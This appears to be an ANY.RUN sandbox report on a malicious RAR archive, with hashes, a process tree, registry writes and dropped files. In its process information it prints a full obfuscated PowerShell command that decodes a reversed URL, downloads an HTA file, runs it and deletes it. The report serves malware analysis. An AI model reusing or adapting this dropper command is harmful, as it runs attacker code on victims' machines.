File name:

project templet test.rar

Full analysis: https://app.any.run/tasks/8087d036-12fb-4d70-a200-8651477296ea
Verdict: Malicious activity
Analysis date: December 04, 2023, 11:54:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

BE272940B6F1302106725B0A2EB23CF4

SHA1:

65D8E40B64902A27E226123491C2C71D91927141

SHA256:

EB430BC903C521549E7B3424C27489B673F75772279C6B5DC2FB22641A143DB9

SSDEEP:

3072:op1zK41sgeaLsmMjfNS88q/TEZ6fLcDgL29JbHPB:op1O4igNsmGfN78eTEYsgL29JbvB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Powershell version downgrade attack

      • powershell.exe (PID: 2632)

    • Reads the Internet Settings

      • mshta.exe (PID: 2600)
      • powershell.exe (PID: 2632)

  • INFO

    • Manual execution by a user

      • powershell.exe (PID: 2632)
      • WINWORD.EXE (PID: 2332)

    • Creates files or folders in the user directory

      • powershell.exe (PID: 2632)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs powershell.exe no specs mshta.exe no specs winword.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2644"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\project templet test.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2632"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ProgressPreference = 0; function nvRClWiAJT($OnUPXhNfGyEh){$OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')}; function sDjLksFILdkrdR($OnUPXhNfGyEh){ $vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh; for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){ try{$zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)} catch{$zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)}};$zRavFAQNJqOVxb}; $NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'; $cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1]; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing; [IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi); & $cDkdhkGBtl; sleep 3; rm $cDkdhkGBtl;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2600"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Roaming\se1.hta" C:\Windows\System32\mshta.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2332"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\our project templet test.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
Total events
5 223
Read events
4 927
Write events
124
Delete events
172

Modification events

(PID) Process:(2644) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
(PID) Process:(2644) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\General
Operation:writeName:LastFolder
Value:
C:\Users\admin\Desktop
Executable files
1
Suspicious files
17
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2332WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD3BF.tmp.cvr
MD5:
SHA256:
2332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{37B6EAAF-4E89-413F-A8C0-4781C10BFDEF}.tmpbinary
MD5:7C048D08625DE85F21DED702AE60244C
SHA256:4E92A332A46DF109D2D22915E49A48FEF1DF1CBB69E3A50EC01A606E8D517CF6
2332WINWORD.EXEC:\Users\admin\Desktop\~WRD0001.tmpdocument
MD5:F0B6C70A002E02E2D73DCB139AA541A5
SHA256:D650DE99277D21302E2678BDF822AB19D26FD75288F6012F1CDCAD60273909D0
2332WINWORD.EXEC:\Users\admin\Desktop\our project templet test.docxdocument
MD5:F0B6C70A002E02E2D73DCB139AA541A5
SHA256:D650DE99277D21302E2678BDF822AB19D26FD75288F6012F1CDCAD60273909D0
2332WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:43EDEBA06E3F40F990A0C5B99B94D225
SHA256:E8E03A6A6216E05E1D2973C79B5DED68E49D2FC7736CC2E3B79654CC5003C13B
2332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso83E.tmpcompressed
MD5:50081567133733120F98B2FAA4E09417
SHA256:92ED2E221B7A675A011510C17ABF084BBEB963359D65E7B1C3E19E1F5D9F0BBA
2332WINWORD.EXEC:\Users\admin\Desktop\~$r project templet test.docxbinary
MD5:F9E356B251CF6DC5534DD40A844B1C96
SHA256:DC226D1B0FE77A42B1CD6255BF9F000E59A2B75DE43E480DA01E94301DE667DA
2332WINWORD.EXEC:\Users\admin\AppData\Local\Temp\msoD621.tmpimage
MD5:ED3C1C40B68BA4F40DB15529D5443DEC
SHA256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
2332WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
2332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2722C250-0A1A-4E21-B94D-2C60EFBF8F91}.tmpbinary
MD5:55536DBA963FF1381AC5C9558CCD4994
SHA256:F85E8A53A2D94EEDAC72A967A3B3E7F4499B239D0CF9B7374C0B0FC5137B23A6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
unknown
4
System
192.168.100.255:138
unknown
2588
svchost.exe
239.255.255.250:1900
unknown
1080
svchost.exe
224.0.0.252:5355
unknown

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
project templet test.rar